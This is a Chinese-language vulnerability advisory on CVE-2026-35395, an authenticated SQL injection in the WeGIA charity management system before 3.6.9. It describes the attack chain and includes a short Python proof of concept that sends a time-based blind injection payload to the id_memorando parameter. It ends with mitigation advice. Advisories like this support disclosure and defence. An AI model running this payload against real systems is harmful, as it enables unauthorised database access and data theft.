IPBUF安全漏洞报告
English
CVE-2026-35395 CVSS 8.8 高危

CVE-2026-35395 WeGIA SQL注入漏洞

披露日期: 2026-04-06

漏洞信息

漏洞编号
CVE-2026-35395
漏洞类型
SQL注入
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
WeGIA

相关标签

SQL注入WeGIACVE-2026-35395Web安全远程代码执行

漏洞概述

WeGIA是一款用于慈善机构的网络管理系统。在3.6.9版本之前,该系统存在严重的SQL注入漏洞。漏洞位于dao/memorando/DespachoDAO.php文件中,由于未对用户输入的id_memorando参数进行有效验证,导致攻击者可以直接拼接SQL语句。任何经过身份认证的用户均可利用此漏洞在数据库中执行任意SQL命令,造成数据泄露或破坏。

技术细节

该漏洞的根源在于WeGIA系统对用户输入处理不当,属于典型的SQL注入漏洞。具体而言,在`dao/memorando/DespachoDAO.php`文件的代码逻辑中,应用程序直接从全局变量`$_REQUEST`中获取`id_memorando`参数,并将其直接拼接到SQL查询语句中。代码层面未使用PDO预处理语句或进行任何严格的类型检查、特殊字符过滤,这导致攻击者可以通过构造恶意输入改变原始查询逻辑。虽然该漏洞需要低权限用户认证(PR:L),但这降低了攻击门槛。攻击者获取普通用户账号后,可发送包含SQL Payload的HTTP请求。利用方式包括利用基于布尔或时间的盲注技术提取数据,或使用UNION查询直接检索敏感信息(如管理员凭据、用户列表)。鉴于CVSS评分达到8.8,该漏洞不仅可能导致数据库中的敏感信息泄露(机密性影响),还可能通过UPDATE或DELETE命令导致数据篡改或丢失(完整性与可用性影响),进而威胁整个系统的安全。

攻击链分析

STEP 1
侦查
攻击者识别目标系统为WeGIA,并确认版本低于3.6.9。
STEP 2
初始访问
攻击者注册或获取一个低权限的普通用户账号(因为PR:L)。
STEP 3
漏洞利用
攻击者向DespachoDAO.php发送恶意构造的HTTP请求,在id_memorando参数中注入SQL语句。
STEP 4
数据窃取与破坏
数据库执行恶意SQL,攻击者获取敏感数据(如管理员密码)或修改/删除数据库内容。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL example # The vulnerable file is dao/memorando/DespachoDAO.php url = "http://target-weigia-instance/dao/memorando/DespachoDAO.php" # The vulnerable parameter is 'id_memorando' # Payload to test SQL Injection (Blind or Error based) # Attempting to cause a delay or specific output to confirm vulnerability payload = { "id_memorando": "1' AND SLEEP(5)-- -" } try: # Send the request # Note: Authentication cookie/session may be required as PR:L is Low response = requests.get(url, params=payload, timeout=10) # Analyze response time to confirm blind SQL injection if response.elapsed.total_seconds() >= 5: print("[+] Vulnerability Confirmed: SQL Injection detected via time-based analysis.") else: print("[-] Test failed or patched.") except requests.RequestException as e: print(f"Error connecting to target: {e}")

影响范围

WeGIA < 3.6.9

防御指南

临时缓解措施
若无法立即升级,建议在Web应用防火墙(WAF)中部署规则,拦截针对DespachoDAO.php的异常SQL请求特征。同时,应临时限制对该文件的访问权限,或通过数据库代理层禁止非必要的SQL操作指令,以降低风险。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表